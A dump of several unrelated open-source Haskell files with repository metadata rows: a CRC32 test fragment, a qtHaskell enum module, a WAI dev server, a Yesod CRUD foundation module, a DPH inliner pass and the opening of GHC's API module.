runTest "crc32Update 0" $ crc32Update 0
runTest "crc32Update 1" $ crc32Update 1
runTest "crc32Update 123" $ crc32Update 123
runTest "crc32Update 0xFFFFFFFF" $ crc32Update 0xFFFFFFFF
| jkff/digest | testing/trivial.hs | bsd-2-clause | 1,594 | 0 | 12 | 451 | 409 | 204 | 205 | 41 | 1 |
{-# OPTIONS -fglasgow-exts #-}
-----------------------------------------------------------------------------
{-| Module : QGLFramebufferObject.hs
Copyright : (c) David Harley 2010
Project : qtHaskell
Version : 1.1.4
Modified : 2010-09-02 17:02:36
Warning : this file is machine generated - do not modify.
--}
-----------------------------------------------------------------------------
module Qtc.Enums.Opengl.QGLFramebufferObject (
Attachment, eNoAttachment, eCombinedDepthStencil, eDepth
)
where
import Qtc.Classes.Base
import Qtc.ClassTypes.Core (QObject, TQObject, qObjectFromPtr)
import Qtc.Core.Base (Qcs, connectSlot, qtc_connectSlot_int, wrapSlotHandler_int)
import Qtc.Enums.Base
import Qtc.Enums.Classes.Core
data CAttachment a = CAttachment a
type Attachment = QEnum(CAttachment Int)
ieAttachment :: Int -> Attachment
ieAttachment x = QEnum (CAttachment x)
instance QEnumC (CAttachment Int) where
qEnum_toInt (QEnum (CAttachment x)) = x
qEnum_fromInt x = QEnum (CAttachment x)
withQEnumResult x
= do
ti <- x
return $ qEnum_fromInt $ fromIntegral ti
withQEnumListResult x
= do
til <- x
return $ map qEnum_fromInt til
instance Qcs (QObject c -> Attachment -> IO ()) where
connectSlot _qsig_obj _qsig_nam _qslt_obj _qslt_nam _handler
= do
funptr <- wrapSlotHandler_int slotHandlerWrapper_int
stptr <- newStablePtr (Wrap _handler)
withObjectPtr _qsig_obj $ \cobj_sig ->
withCWString _qsig_nam $ \cstr_sig ->
withObjectPtr _qslt_obj $ \cobj_slt ->
withCWString _qslt_nam $ \cstr_slt ->
qtc_connectSlot_int cobj_sig cstr_sig cobj_slt cstr_slt (toCFunPtr funptr) (castStablePtrToPtr stptr)
return ()
where
slotHandlerWrapper_int :: Ptr fun -> Ptr () -> Ptr (TQObject c) -> CInt -> IO ()
slotHandlerWrapper_int funptr stptr qobjptr cint
= do qobj <- qObjectFromPtr qobjptr
let hint = fromCInt cint
if (objectIsNull qobj)
then do when (stptr/=ptrNull)
(freeStablePtr (castPtrToStablePtr stptr))
when (funptr/=ptrNull)
(freeHaskellFunPtr (castPtrToFunPtr funptr))
else _handler qobj (qEnum_fromInt hint)
return ()
eNoAttachment :: Attachment
eNoAttachment
= ieAttachment $ 0
eCombinedDepthStencil :: Attachment
eCombinedDepthStencil
= ieAttachment $ 1
eDepth :: Attachment
eDepth
= ieAttachment $ 2
| uduki/hsQt | Qtc/Enums/Opengl/QGLFramebufferObject.hs | bsd-2-clause | 2,466 | 0 | 18 | 530 | 606 | 309 | 297 | 54 | 1 |
{-# LANGUAGE DeriveDataTypeable #-}
import Network.Wai.Handler.DevelServer (run)
import System.Console.CmdArgs
import Control.Concurrent (forkIO)
data Devel = Devel
{ port :: Int
, moduleName :: String
, function :: String
, yesod :: Bool
}
deriving (Show, Data, Typeable)
main :: IO ()
main = do
Devel p m f y <- cmdArgs Devel
{ port = 3000 &= argPos 0 &= typ "PORT"
, moduleName = "" &= argPos 1 &= typ "MODULE"
, function = "" &= argPos 2 &= typ "FUNCTION"
, yesod = False &= help "Monitor typical Yesod folders (hamlet, etc)"
} &= summary "WAI development web server"
_ <- forkIO $ run p m f $ folders y
go
where
folders False = []
folders True = ["hamlet", "cassius", "julius"]
go = do
x <- getLine
case x of
'q':_ -> putStrLn "Quitting, goodbye!"
_ -> go
| stevenrobertson/wai-handler-devel | wai-handler-devel.hs | bsd-2-clause | 893 | 0 | 14 | 273 | 289 | 151 | 138 | 27 | 3 |
{-# LANGUAGE FlexibleInstances #-}
module Foundation where
import Import.NoFoundation
import Database.Persist.Sql (ConnectionPool, runSqlPool)
import Text.Hamlet (hamletFile)
import Text.Jasmine (minifym)
import Yesod.Auth.BrowserId (authBrowserId)
import Yesod.Default.Util (addStaticContentExternal)
import Yesod.Core.Types (Logger)
import qualified Yesod.Core.Unsafe as Unsafe
import Yesod.Contrib.League.Crud
import Yesod.Contrib.League.Crud.TVarMap
import qualified Network.Wai as Wai
-- | The foundation datatype for your application. This can be a good place to
-- keep settings and values requiring initialization before your application
-- starts running, such as database connections. Every handler will have
-- access to the data present here.
data App = App
{ appSettings :: AppSettings
, appStatic :: Static -- ^ Settings for static file serving.
, appConnPool :: ConnectionPool -- ^ Database connection pool.
, appHttpManager :: Manager
, appLogger :: Logger
, appRequests :: TVar (Map CrudTVarKey Wai.Request)
}
instance HasHttpManager App where
getHttpManager = appHttpManager
data UserCrud = UserCrud
instance CrudTypes UserCrud where
type Site UserCrud = App
type ObjId UserCrud = UserId
type Obj UserCrud = User
mkUserCrud :: a -> CrudSubsite UserCrud
mkUserCrud _ = CrudSubsite UserCrud
data PubCrud = PubCrud UserId
instance CrudTypes PubCrud where
type Site PubCrud = App
type ObjId PubCrud = PublicationId
type Obj PubCrud = Publication
mkPubCrud :: a -> UserId -> CrudSubsite PubCrud
mkPubCrud _ = CrudSubsite . PubCrud
data LogCrud = LogCrud
instance CrudTypes LogCrud where
type Site LogCrud = App
type ObjId LogCrud = CrudTVarKey
type Obj LogCrud = Wai.Request
mkLogCrud :: a -> CrudSubsite LogCrud
mkLogCrud _ = CrudSubsite LogCrud
instance RenderMessage (CrudSubsite LogCrud) CrudMessage where
renderMessage _ _ CrudMsgEntity = "Log entry"
renderMessage _ _ CrudMsgEntities = "Log entries"
renderMessage _ _ m = defaultCrudMessage m
instance Crud LogCrud where
crudDB = return $ crudTVarMapDefaults $
appRequests <$> liftHandlerT getYesod
crudShow = return . tshow
crudListWidget = do
reqs <- crudSelect
parent <- getRouter
let reqClass "POST" = asText "warning"
reqClass _ = ""
return $(widgetFile "request-logs")
-- This is where we define all of the routes in our application. For a full
-- explanation of the syntax, please see:
-- http://www.yesodweb.com/book/routing-and-handlers
--
-- Note that this is really half the story; in Application.hs, mkYesodDispatch
-- generates the rest of the code. Please see the linked documentation for an
-- explanation for this split.
mkYesodData "App" $(parseRoutesFile "config/routes")
-- | A convenient synonym for creating forms.
type Form x = Html -> MForm (HandlerT App IO) (FormResult x, Widget)
-- Please see the documentation for the Yesod typeclass. There are a number
-- of settings which can be configured by overriding methods here.
instance Yesod App where
-- Controls the base of generated URLs. For more information on modifying,
-- see: https://github.com/yesodweb/yesod/wiki/Overriding-approot
approot = ApprootMaster $ appRoot . appSettings
-- Store session data on the client in encrypted cookies,
-- default session idle timeout is 120 minutes
makeSessionBackend _ = fmap Just $ defaultClientSessionBackend
120 -- timeout in minutes
"config/client_session_key.aes"
defaultLayout widget = do
master <- getYesod
mmsg <- getMessage
crumbs <- breadcrumbs
-- We break up the default layout into two components:
-- default-layout is the contents of the body tag, and
-- default-layout-wrapper is the entire page. Since the final
-- value passed to hamletToRepHtml cannot be a widget, this allows
-- you to use normal widget features in default-layout.
pc <- widgetToPageContent $ do
addStylesheet $ StaticR css_bootstrap_css
$(widgetFile "default-layout")
withUrlRenderer $(hamletFile "templates/default-layout-wrapper.hamlet")
-- The page to be redirected to when authentication is required.
authRoute _ = Just $ AuthR LoginR
-- Routes not requiring authentication.
isAuthorized _ _ = do
req <- reqWaiRequest <$> getRequest
void $ runCrudSite LogCrud LogCrudR $ crudInsert req
return Authorized
-- This function creates static content files in the static folder
-- and names them based on a hash of their content. This allows
-- expiration dates to be set far in the future without worry of
-- users receiving stale content.
addStaticContent ext mime content = do
master <- getYesod
let staticDir = appStaticDir $ appSettings master
addStaticContentExternal
minifym
genFileName
staticDir
(StaticR . flip StaticRoute [])
ext
mime
content
where
-- Generate a unique filename based on the content itself
genFileName lbs = "autogen-" ++ base64md5 lbs
-- What messages should be logged. The following includes all messages when
-- in development, and warnings and errors in production.
shouldLog app _source level =
appShouldLogAll (appSettings app)
|| level == LevelWarn
|| level == LevelError
makeLogger = return . appLogger
-- How to run database actions.
instance YesodPersist App where
type YesodPersistBackend App = SqlBackend
runDB action = do
master <- getYesod
runSqlPool action $ appConnPool master
instance YesodPersistRunner App where
getDBRunner = defaultGetDBRunner appConnPool
instance YesodAuth App where
type AuthId App = UserId
-- Where to send a user after successful login
loginDest _ = HomeR
-- Where to send a user after logout
logoutDest _ = HomeR
-- Override the above two destinations when a Referer: header is present
redirectToReferer _ = True
getAuthId creds = runDB $ do
x <- getBy $ UniqueUser $ credsIdent creds
case x of
Just (Entity uid _) -> return $ Just uid
Nothing -> do
fmap Just $ insert User
{ userIdent = credsIdent creds
, userPassword = Nothing
, userFullName = Nothing
, userIsAdmin = False
}
-- You can add other plugins like BrowserID, email or OAuth here
authPlugins _ = [authBrowserId def]
authHttpManager = getHttpManager
instance YesodAuthPersist App
instance YesodBreadcrumbs App where
breadcrumb (UserCrudR CrudListR) = return ("Users", Just HomeR)
breadcrumb (UserCrudR (CrudDeleteR uid)) = return ("Delete", Just (PubCrudR uid CrudListR))
breadcrumb (UserCrudR (CrudUpdateR uid)) = return ("Update", Just (PubCrudR uid CrudListR))
breadcrumb (PubCrudR uid CrudListR) = do
u <- runDB $ get404 uid
return (userName u, Just (UserCrudR CrudListR))
breadcrumb (PubCrudR uid CrudCreateR) = return ("Add publication", Just (PubCrudR uid CrudListR))
breadcrumb (PubCrudR uid (CrudUpdateR _)) = return ("Edit publication", Just (PubCrudR uid CrudListR))
breadcrumb (PubCrudR uid (CrudDeleteR _)) = return ("Remove publication", Just (PubCrudR uid CrudListR))
breadcrumb (LogCrudR CrudListR) = return ("Log entries", Just HomeR)
breadcrumb (LogCrudR (CrudDeleteR _)) = return ("Delete", Just (LogCrudR CrudListR))
breadcrumb _ = return ("Home", Nothing)
-- This instance is required to use forms. You can modify renderMessage to
-- achieve customized and internationalized form validation messages.
instance RenderMessage App FormMessage where
renderMessage _ _ = defaultFormMessage
unsafeHandler :: App -> Handler a -> IO a
unsafeHandler = Unsafe.fakeHandlerGetLogger appLogger
-- Note: Some functionality previously present in the scaffolding has been
-- moved to documentation in the Wiki. Following are some hopefully helpful
-- links:
--
-- https://github.com/yesodweb/yesod/wiki/Sending-email
-- https://github.com/yesodweb/yesod/wiki/Serve-static-files-from-a-separate-domain
-- https://github.com/yesodweb/yesod/wiki/i18n-messages-in-the-scaffolding
| league/yesod-crud | example/Foundation.hs | bsd-3-clause | 8,403 | 0 | 18 | 1,892 | 1,588 | 829 | 759 | -1 | -1 |
-- The Summoner is a demand-driven inliner.
-- We give it the name of a function we want summoned, and it will inline
-- everything it can find into it.
--
-- The summoner ignores GHC generated inliner heuristics (UnfoldingGuidance)
-- as well as NOINLINE pragmas for bindings in the module being compiled.
--
-- It does respect loop breaker markers, as we can't summon into recursive
-- functions indefinately. It also respects INLINE [N] phase numbers,
-- because rewrite rules depend on these to fire.
--
module DPH.Pass.Summon
(passSummon)
where
import DPH.Core.Pretty
import HscTypes
import CoreSyn
import CoreMonad
import Avail
import Data.Maybe
import Data.Set (Set)
import qualified UniqFM as UFM
import qualified Data.Set as Set
import Control.Monad
import Debug.Trace
-- Pass -----------------------------------------------------------------------
passSummon :: ModGuts -> CoreM ModGuts
passSummon guts
= do let tops = mg_binds guts
-- Get the names of the vectorised versions of all exported bindings.
let nsExported = [ n | Avail n <- mg_exports guts]
let nsExported_vect
= catMaybes
$ map (UFM.lookupUFM (vectInfoVar $ mg_vect_info guts))
$ nsExported
-- Summon all of the vectorised things.
let summonMe
= Set.fromList
$ map snd
$ nsExported_vect
tops' <- mapM (summonTop summonMe tops) tops
return $ guts { mg_binds = tops'}
-- Top ------------------------------------------------------------------------
-- | If some `CoreBind` is in the set, then summon all its parts.
summonTop
:: Set CoreBndr -- ^ Summon into bindings with these binders.
-> [CoreBind] -- ^ All the top-level bindings for this module.
-> CoreBind -- ^ Binding to inspect
-> CoreM CoreBind
summonTop bsSet tops bind
= case bind of
NonRec b x
-> do (b', x') <- goSummon (b, x)
return $ NonRec b' x'
Rec bxs
-> do bxs' <- mapM goSummon bxs
return $ Rec bxs'
where
goSummon (b, x)
| Set.member b bsSet = summon tops (b, x)
| otherwise = return (b, x)
-- Summon ---------------------------------------------------------------------
-- | Inline everything we can find into this binding.
summon :: [CoreBind] -- ^ All the top-level bindings for this module.
-> (CoreBndr, Expr CoreBndr) -- ^ The binding to work on.
-> CoreM (CoreBndr, Expr CoreBndr)
summon tops (b, xx)
= trace (renderIndent $ text "summoning " <> ppr b)
$ do xx' <- summonX tops xx
return (b, xx')
-- | Summon into an expression.
summonX :: [CoreBind]
-> Expr CoreBndr
-> CoreM (Expr CoreBndr)
summonX tops xx
= let down = summonX tops
in case xx of
Var n
-> trace (renderIndent $ text "look at " <> ppr n)
$ case lookupBind tops n of
Nothing -> return xx
Just x' -> summonX tops x'
Lit{} -> return xx
App x arg -> liftM2 App (down x) (down arg)
Lam b x -> liftM2 Lam (return b) (down x)
Let bnd x -> liftM2 Let (summonB tops bnd) (down x)
Case x b t alts -> liftM4 Case (down x)
(return b) (return t)
(mapM (summonA tops) alts)
Cast x co -> liftM2 Cast (down x) (return co)
Tick t x -> liftM2 Tick (return t) (down x)
Type t -> return xx
Coercion co -> return xx
-- | Summon into an alternative.
summonA :: [CoreBind]
-> (AltCon, [CoreBndr], Expr CoreBndr)
-> CoreM (AltCon, [CoreBndr], Expr CoreBndr)
summonA tops (con, bs, x)
= do x' <- summonX tops x
return $ (con, bs, x')
-- | Summon into a let-binding.
summonB :: [CoreBind]
-> Bind CoreBndr
-> CoreM (Bind CoreBndr)
summonB tops bb
= case bb of
NonRec b x
-> liftM2 NonRec (return b) (summonX tops x)
Rec bxs
-> do let (bs, xs) = unzip bxs
xs' <- mapM (summonX tops) xs
return $ Rec $ zip bs xs
lookupBind
:: [CoreBind]
-> CoreBndr
-> Maybe (Expr CoreBndr)
lookupBind tops b
= case tops of
[] -> Nothing
(NonRec b' x : _)
| b == b' -> Just x
_ : ts -> lookupBind ts b
| mainland/dph | dph-plugin/DPH/Pass/Summon.hs | bsd-3-clause | 4,672 | 0 | 17 | 1,645 | 1,218 | 613 | 605 | 99 | 11 |
{-# LANGUAGE CPP, NondecreasingIndentation, ScopedTypeVariables #-}
-- -----------------------------------------------------------------------------
--
-- (c) The University of Glasgow, 2005-2012
--
-- The GHC API
--
-- -----------------------------------------------------------------------------
module GHC (
-- * Initialisation
defaultErrorHandler,
defaultCleanupHandler,
prettyPrintGhcErrors,
-- * GHC Monad
Ghc, GhcT, GhcMonad(..), HscEnv,
runGhc, runGhcT, initGhcMonad,
gcatch, gbracket, gfinally,
printException,
handleSourceError,
needsTemplateHaskell,
-- * Flags and settings
DynFlags(..), GeneralFlag(..), Severity(..), HscTarget(..), gopt,
GhcMode(..), GhcLink(..), defaultObjectTarget,
parseDynamicFlags,
getSessionDynFlags, setSessionDynFlags,
getProgramDynFlags, setProgramDynFlags,
getInteractiveDynFlags, setInteractiveDynFlags,
parseStaticFlags,
-- * Targets
Target(..), TargetId(..), Phase,
setTargets,
getTargets,
addTarget,
removeTarget,
guessTarget,
-- * Loading\/compiling the program
depanal,
load, LoadHowMuch(..), InteractiveImport(..),
SuccessFlag(..), succeeded, failed,
defaultWarnErrLogger, WarnErrLogger,
workingDirectoryChanged,
parseModule, typecheckModule, desugarModule, loadModule,
ParsedModule(..), TypecheckedModule(..), DesugaredModule(..),
TypecheckedSource, ParsedSource, RenamedSource, -- ditto
TypecheckedMod, ParsedMod,
moduleInfo, renamedSource, typecheckedSource,
parsedSource, coreModule,
-- ** Compiling to Core
CoreModule(..),
compileToCoreModule, compileToCoreSimplified,
-- * Inspecting the module structure of the program
ModuleGraph, ModSummary(..), ms_mod_name, ModLocation(..),
getModSummary,
getModuleGraph,
isLoaded,
topSortModuleGraph,
-- * Inspecting modules
ModuleInfo,
getModuleInfo,
modInfoTyThings,
modInfoTopLevelScope,
modInfoExports,
modInfoInstances,
modInfoIsExportedName,
modInfoLookupName,
modInfoIface,
modInfoSafe,
lookupGlobalName,
findGlobalAnns,
mkPrintUnqualifiedForModule,
ModIface(..),
SafeHaskellMode(..),
-- * Querying the environment
-- packageDbModules,
-- * Printing
PrintUnqualified, alwaysQualify,
-- * Interactive evaluation
getBindings, getInsts, getPrintUnqual,
findModule, lookupModule,
#ifdef GHCI
isModuleTrusted,
moduleTrustReqs,
setContext, getContext,
getNamesInScope,
getRdrNamesInScope,
getGRE,
moduleIsInterpreted,
getInfo,
exprType,
typeKind,
parseName,
RunResult(..),
runStmt, runStmtWithLocation, runDecls, runDeclsWithLocation,
runTcInteractive, -- Desired by some clients (Trac #8878)
parseImportDecl, SingleStep(..),
resume,
Resume(resumeStmt, resumeThreadId, resumeBreakInfo, resumeSpan,
resumeHistory, resumeHistoryIx),
History(historyBreakInfo, historyEnclosingDecls),
GHC.getHistorySpan, getHistoryModule,
getResumeContext,
abandon, abandonAll,
InteractiveEval.back,
InteractiveEval.forward,
showModule,
isModuleInterpreted,
InteractiveEval.compileExpr, HValue, dynCompileExpr,
GHC.obtainTermFromId, GHC.obtainTermFromVal, reconstructType,
modInfoModBreaks,
ModBreaks(..), BreakIndex,
BreakInfo(breakInfo_number, breakInfo_module),
BreakArray, setBreakOn, setBreakOff, getBreak,
#endif
lookupName,
#ifdef GHCI
-- ** EXPERIMENTAL
setGHCiMonad,
#endif
-- * Abstract syntax elements
-- ** Packages
PackageKey,
-- ** Modules
Module, mkModule, pprModule, moduleName, modulePackageKey,
ModuleName, mkModuleName, moduleNameString,
-- ** Names
Name,
isExternalName, nameModule, pprParenSymName, nameSrcSpan,
NamedThing(..),
RdrName(Qual,Unqual),
-- ** Identifiers
Id, idType,
isImplicitId, isDeadBinder,
isExportedId, isLocalId, isGlobalId,
isRecordSelector,
isPrimOpId, isFCallId, isClassOpId_maybe,
isDataConWorkId, idDataCon,
isBottomingId, isDictonaryId,
recordSelectorFieldLabel,
-- ** Type constructors
TyCon,
tyConTyVars, tyConDataCons, tyConArity,
isClassTyCon, isTypeSynonymTyCon, isTypeFamilyTyCon, isNewTyCon,
isPrimTyCon, isFunTyCon,
isFamilyTyCon, isOpenFamilyTyCon, isOpenTypeFamilyTyCon,
tyConClass_maybe,
synTyConRhs_maybe, synTyConDefn_maybe, synTyConResKind,
-- ** Type variables
TyVar,
alphaTyVars,
-- ** Data constructors
DataCon,
dataConSig, dataConType, dataConTyCon, dataConFieldLabels,
dataConIsInfix, isVanillaDataCon, dataConUserType,
dataConSrcBangs,
StrictnessMark(..), isMarkedStrict,
-- ** Classes
Class,
classMethods, classSCTheta, classTvsFds, classATs,
pprFundeps,
-- ** Instances
ClsInst,
instanceDFunId,
pprInstance, pprInstanceHdr,
pprFamInst,
FamInst,
-- ** Types and Kinds
Type, splitForAllTys, funResultTy,
pprParendType, pprTypeApp,
Kind,
PredType,
ThetaType, pprForAll, pprThetaArrowTy,
-- ** Entities
TyThing(..),
-- ** Syntax
module HsSyn, -- ToDo: remove extraneous bits
-- ** Fixities
FixityDirection(..),
defaultFixity, maxPrecedence,
negateFixity,
compareFixity,
-- ** Source locations
SrcLoc(..), RealSrcLoc,
mkSrcLoc, noSrcLoc,
srcLocFile, srcLocLine, srcLocCol,
SrcSpan(..), RealSrcSpan,
mkSrcSpan, srcLocSpan, isGoodSrcSpan, noSrcSpan,
srcSpanStart, srcSpanEnd,
srcSpanFile,
srcSpanStartLine, srcSpanEndLine,
srcSpanStartCol, srcSpanEndCol,
-- ** Located
GenLocated(..), Located,
-- *** Constructing Located
noLoc, mkGeneralLocated,
-- *** Deconstructing Located
getLoc, unLoc,
-- *** Combining and comparing Located values
eqLocated, cmpLocated, combineLocs, addCLoc,
leftmost_smallest, leftmost_largest, rightmost,
spans, isSubspanOf,
-- * Exceptions
GhcException(..), showGhcException,
-- * Token stream manipulations
Token,
getTokenStream, getRichTokenStream,
showRichTokenStream, addSourceToTokens,
-- * Pure interface to the parser
parser,
-- * API Annotations
ApiAnns,AnnKeywordId(..),AnnotationComment(..),
getAnnotation, getAndRemoveAnnotation,
getAnnotationComments, getAndRemoveAnnotationComments,
-- * Miscellaneous
--sessionHscEnv,
cyclicModuleErr,
) where
{-
ToDo:
* inline bits of HscMain here to simplify layering: hscTcExpr, hscStmt.
* what StaticFlags should we expose, if any?
-}
#include "HsVersions.h"
#ifdef GHCI
import ByteCodeInstr
import BreakArray
import InteractiveEval
import TcRnDriver ( runTcInteractive )
#endif
import PprTyThing ( pprFamInst )
import HscMain
import GhcMake
import DriverPipeline ( compileOne' )
import GhcMonad
import TcRnMonad ( finalSafeMode )
import TcRnTypes
import Packages
import NameSet
import RdrName
import qualified HsSyn -- hack as we want to reexport the whole module
import HsSyn
import Type hiding( typeKind )
import Kind ( synTyConResKind )
import TcType hiding( typeKind )
import Id
import TysPrim ( alphaTyVars )
import TyCon
import Class
import DataCon
import Name hiding ( varName )
import Avail
import InstEnv
import FamInstEnv ( FamInst )
import SrcLoc
import CoreSyn
import TidyPgm
import DriverPhases ( Phase(..), isHaskellSrcFilename )
import Finder
import HscTypes
import DynFlags
import StaticFlags
import SysTools
import Annotations
import Module
import UniqFM
import Panic
import Platform
import Bag ( unitBag )
import ErrUtils
import MonadUtils
import Util
import StringBuffer
import Outputable
import BasicTypes
import Maybes ( expectJust )
import FastString
import qualified Parser
import Lexer
import ApiAnnotation
import System.Directory ( doesFileExist )
import Data.Maybe
import Data.List ( find )
import Data.Time
import Data.Typeable ( Typeable )
import Data.Word ( Word8 )
import Control.Monad
import System.Exit ( exitWith, ExitCode(..) )
import Exception
import Data.IORef
import System.FilePath
import System.IO
import Prelude hiding (init)
-- %************************************************************************
-- %* *
-- Initialisation: exception handlers
-- %* *
-- %************************************************************************
-- | Install some default exception handlers and run the inner computation.
-- Unless you want to handle exceptions yourself, you should wrap this around
-- the top level of your program. The default handlers output the error
-- message(s) to stderr and exit cleanly.
defaultErrorHandler :: (ExceptionMonad m)
=> FatalMessager -> FlushOut -> m a -> m a
defaultErrorHandler fm (FlushOut flushOut) inner =
-- top-level exception handler: any unrecognised exception is a compiler bug.
ghandle (\exception -> liftIO $ do
flushOut
case fromException exception of
-- an IO exception probably isn't our fault, so don't panic
Just (ioe :: IOException) ->
fatalErrorMsg'' fm (show ioe)
_ -> case fromException exception of
Just UserInterrupt ->
-- Important to let this one propagate out so our
-- calling process knows we were interrupted by ^C
liftIO $ throwIO UserInterrupt
Just StackOverflow ->
fatalErrorMsg'' fm "stack overflow: use +RTS -K<size> to increase it"
_ -> case fromException exception of
Just (ex :: ExitCode) -> liftIO $ throwIO ex
_ ->
fatalErrorMsg'' fm
(show (Panic (show exception)))
exitWith (ExitFailure 1)
) $
-- error messages propagated as exceptions
handleGhcException
(\ge -> liftIO $ do
flushOut
case ge of
PhaseFailed _ code -> exitWith code
Signal _ -> exitWith (ExitFailure 1)
_ -> do fatalErrorMsg'' fm (show ge)
exitWith (ExitFailure 1)
) $
inner
-- | Install a default cleanup handler to remove temporary files deposited by
-- a GHC run. This is separate from 'defaultErrorHandler', because you might
-- want to override the error handling, but still get the ordinary cleanup
-- behaviour.
defaultCleanupHandler :: (ExceptionMonad m) =>
DynFlags -> m a -> m a
defaultCleanupHandler dflags inner =
-- make sure we clean up after ourselves
inner `gfinally`
(liftIO $ do
cleanTempFiles dflags
cleanTempDirs dflags
)
-- exceptions will be blocked while we clean the temporary files,
-- so there shouldn't be any difficulty if we receive further
-- signals.
-- %************************************************************************
-- %* *
-- The Ghc Monad
-- %* *
-- %************************************************************************
-- | Run function for the 'Ghc' monad.
--
-- It initialises the GHC session and warnings via 'initGhcMonad'. Each call
-- to this function will create a new session which should not be shared among
-- several threads.
--
-- Any errors not handled inside the 'Ghc' action are propagated as IO
-- exceptions.
runGhc :: Maybe FilePath -- ^ See argument to 'initGhcMonad'.
-> Ghc a -- ^ The action to perform.
-> IO a
runGhc mb_top_dir ghc = do
ref <- newIORef (panic "empty session")
let session = Session ref
flip unGhc session $ do
initGhcMonad mb_top_dir
ghc
-- XXX: unregister interrupt handlers here?
-- | Run function for 'GhcT' monad transformer.
--
-- It initialises the GHC session and warnings via 'initGhcMonad'. Each call
-- to this function will create a new session which should not be shared among
-- several threads.
#if __GLASGOW_HASKELL__ < 710
-- Pre-AMP change
runGhcT :: (ExceptionMonad m, Functor m) =>
#else
runGhcT :: (ExceptionMonad m) =>
#endif
Maybe FilePath -- ^ See argument to 'initGhcMonad'.
-> GhcT m a -- ^ The action to perform.
-> m a
runGhcT mb_top_dir ghct = do
ref <- liftIO $ newIORef (panic "empty session")
let session = Session ref
flip unGhcT session $ do
initGhcMonad mb_top_dir
ghct
-- | Initialise a GHC session.
--
-- If you implement a custom 'GhcMonad' you must call this function in the
-- monad run function. It will initialise the session variable and clear all
-- warnings.
--
-- The first argument should point to the directory where GHC's library files
-- reside. More precisely, this should be the output of @ghc --print-libdir@
-- of the version of GHC the module using this API is compiled with. For
-- portability, you should use the @ghc-paths@ package, available at
-- <http://hackage.haskell.org/package/ghc-paths>.
initGhcMonad :: GhcMonad m => Maybe FilePath -> m ()
initGhcMonad mb_top_dir
= do { env <- liftIO $
do { installSignalHandlers -- catch ^C
; initStaticOpts
; mySettings <- initSysTools mb_top_dir
; dflags <- initDynFlags (defaultDynFlags mySettings)
; checkBrokenTablesNextToCode dflags
; setUnsafeGlobalDynFlags dflags
-- c.f. DynFlags.parseDynamicFlagsFull, which
-- creates DynFlags and sets the UnsafeGlobalDynFlags
; newHscEnv dflags }
; setSession env }
-- | The binutils linker on ARM emits unnecessary R_ARM_COPY relocations which
-- breaks tables-next-to-code in dynamically linked modules. This
-- check should be more selective but there is currently no released
-- version where this bug is fixed.
-- See https://sourceware.org/bugzilla/show_bug.cgi?id=16177 and
-- https://ghc.haskell.org/trac/ghc/ticket/4210#comment:29
checkBrokenTablesNextToCode :: MonadIO m => DynFlags -> m ()
checkBrokenTablesNextToCode dflags
= do { broken <- checkBrokenTablesNextToCode' dflags
; when broken
$ do { _ <- liftIO $ throwIO $ mkApiErr dflags invalidLdErr
; fail "unsupported linker"
}
}
where
invalidLdErr = text "Tables-next-to-code not supported on ARM" <+>
text "when using binutils ld (please see:" <+>
text "https://sourceware.org/bugzilla/show_bug.cgi?id=16177)"
checkBrokenTablesNextToCode' :: MonadIO m => DynFlags -> m Bool
checkBrokenTablesNextToCode' dflags
| not (isARM arch) = return False
| WayDyn `notElem` ways dflags = return False
| not (tablesNextToCode dflags) = return False
| otherwise = do
linkerInfo <- liftIO $ getLinkerInfo dflags
case linkerInfo of
GnuLD _ -> return True
_ -> return False
where platform = targetPlatform dflags
arch = platformArch platform
-- %************************************************************************
-- %* *
-- Flags & settings
-- %* *
-- %************************************************************************
-- $DynFlags
--
-- The GHC session maintains two sets of 'DynFlags':
--
-- * The "interactive" @DynFlags@, which are used for everything
-- related to interactive evaluation, including 'runStmt',
-- 'runDecls', 'exprType', 'lookupName' and so on (everything
-- under \"Interactive evaluation\" in this module).
--
-- * The "program" @DynFlags@, which are used when loading
-- whole modules with 'load'
--
-- 'setInteractiveDynFlags', 'getInteractiveDynFlags' work with the
-- interactive @DynFlags@.
--
-- 'setProgramDynFlags', 'getProgramDynFlags' work with the
-- program @DynFlags@.
--
-- 'setSessionDynFlags' sets both @DynFlags@, and 'getSessionDynFlags'
-- retrieves the program @DynFlags@ (for backwards compatibility).
-- | Updates both the interactive and program DynFlags in a Session.
-- This also reads the package database (unless it has already been
-- read), and prepares the compilers knowledge about packages. It can
-- be called again to load new packages: just add new package flags to
-- (packageFlags dflags).
--
-- Returns a list of new packages that may need to be linked in using
-- the dynamic linker (see 'linkPackages') as a result of new package
-- flags. If you are not doing linking or doing static linking, you
-- can ignore the list of packages returned.
--
setSessionDynFlags :: GhcMonad m => DynFlags -> m [PackageKey]
setSessionDynFlags dflags = do
(dflags', preload) <- liftIO $ initPackages dflags
modifySession $ \h -> h{ hsc_dflags = dflags'
, hsc_IC = (hsc_IC h){ ic_dflags = dflags' } }
invalidateModSummaryCache
return preload
-- | Sets the program 'DynFlags'.
setProgramDynFlags :: GhcMonad m => DynFlags -> m [PackageKey]
setProgramDynFlags dflags = do
(dflags', preload) <- liftIO $ initPackages dflags
modifySession $ \h -> h{ hsc_dflags = dflags' }
invalidateModSummaryCache
return preload
-- When changing the DynFlags, we want the changes to apply to future
-- loads, but without completely discarding the program. But the
-- DynFlags are cached in each ModSummary in the hsc_mod_graph, so
-- after a change to DynFlags, the changes would apply to new modules
-- but not existing modules; this seems undesirable.
--
-- Furthermore, the GHC API client might expect that changing
-- log_action would affect future compilation messages, but for those
-- modules we have cached ModSummaries for, we'll continue to use the
-- old log_action. This is definitely wrong (#7478).
--
-- Hence, we invalidate the ModSummary cache after changing the
-- DynFlags. We do this by tweaking the date on each ModSummary, so
-- that the next downsweep will think that all the files have changed
-- and preprocess them again. This won't necessarily cause everything
-- to be recompiled, because by the time we check whether we need to
-- recopmile a module, we'll have re-summarised the module and have a
-- correct ModSummary.
--
invalidateModSummaryCache :: GhcMonad m => m ()
invalidateModSummaryCache =
modifySession $ \h -> h { hsc_mod_graph = map inval (hsc_mod_graph h) }
where
inval ms = ms { ms_hs_date = addUTCTime (-1) (ms_hs_date ms) }
-- | Returns the program 'DynFlags'.
getProgramDynFlags :: GhcMonad m => m DynFlags
getProgramDynFlags = getSessionDynFlags
-- | Set the 'DynFlags' used to evaluate interactive expressions.
-- Note: this cannot be used for changes to packages. Use
-- 'setSessionDynFlags', or 'setProgramDynFlags' and then copy the
-- 'pkgState' into the interactive @DynFlags@.
setInteractiveDynFlags :: GhcMonad m => DynFlags -> m ()
setInteractiveDynFlags dflags = do
modifySession $ \h -> h{ hsc_IC = (hsc_IC h) { ic_dflags = dflags }}
